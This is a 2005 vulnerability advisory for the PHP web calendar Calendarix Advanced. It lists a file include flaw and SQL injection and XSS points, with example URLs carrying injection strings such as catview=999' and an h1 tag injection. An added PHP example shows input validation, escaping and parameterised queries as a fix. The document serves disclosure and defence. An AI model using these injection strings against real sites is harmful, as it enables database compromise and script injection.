/***********************************************
* Advisory: 01-0005-15
* Title: Multiple vulnerabilities
* Software: Calendarix Advanced
* Date: 28. April 2005
* Web: http://www.calendarix.com/
************************************************/

- Affected software description:

Webcalendar is web software written in PHP and MySQL.

- Exploit:

Include

line 16
admin/cal_admintop.php: include_once ($calpath."cal_utils.php");

XSS and SQL injection

line 122 - 160
cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*

cal_pophols.php?id=999'[sql]/*

line 23
calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1

line 194 - 196
cal_week.php?op=week&catview= 999'[sql]/*

line 34 - 39
cal_cat.php?op=cats&catview=999'[sql]*/

- How to fix:

The vendor has not responded.

- Credits:

DarkBicho
Email: darkbicho@gmail.com
Web: http://www.swp-scene.org

- Greetings:

"To my Team SWP"
"Long live Peru, damn it"

--
Miguel Sumaran (DarkBicho)
webpage: http://www.darkbicho.tk/
Team : http://www.swp-scene.org/
Made in Peru
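
Since the advisory lists no fix, the following PHP is an added example of input handling that closes the three issue classes above; it is not part of the original advisory and not Calendarix code. It assumes catview, id and year are meant to be integers, date is a YYYY-MM-DD value, and the include base should never come from the request; CAL_PATH, the cal_* helper functions and the calendar_events table are hypothetical names.

```php
<?php
declare(strict_types=1);

// Include base fixed in code, so no request value can reach include_once.
define('CAL_PATH', __DIR__ . '/');
// include_once CAL_PATH . 'cal_utils.php';   // instead of $calpath."cal_utils.php"

/** Read a request parameter as a non-negative integer, else return $default. */
function cal_int_param(array $query, string $name, int $default = 0): int
{
    $value = filter_var($query[$name] ?? null, FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 0]]);
    return is_int($value) ? $value : $default;
}

/** Accept only a real calendar date in YYYY-MM-DD form, else null. */
function cal_date_param(array $query, string $name): ?string
{
    $raw = $query[$name] ?? null;
    if (!is_string($raw)) {
        return null;
    }
    $parsed = DateTimeImmutable::createFromFormat('!Y-m-d', $raw);
    return ($parsed !== false && $parsed->format('Y-m-d') === $raw) ? $raw : null;
}

/** Escape a value before echoing it into an HTML page. */
function cal_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

/** Parameterised query; table and column names are assumptions. */
function cal_events_for_day(PDO $db, string $date, int $catview): array
{
    $stmt = $db->prepare(
        'SELECT id, title FROM calendar_events WHERE day = :day AND cat = :cat'
    );
    $stmt->execute([':day' => $date, ':cat' => $catview]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample request using the parameter names listed in the advisory.
$query = ['op' => 'day', 'date' => '2005-05-03', 'catview' => "999'", 'year' => '2<h1>'];
var_dump(cal_int_param($query, 'catview'));     // malformed value falls back to the default
var_dump(cal_int_param($query, 'year', 2005));  // malformed value falls back to the default
var_dump(cal_date_param($query, 'date'));       // well-formed date is passed through
echo cal_html($query['year']), PHP_EOL;         // markup is entity-encoded, not rendered
```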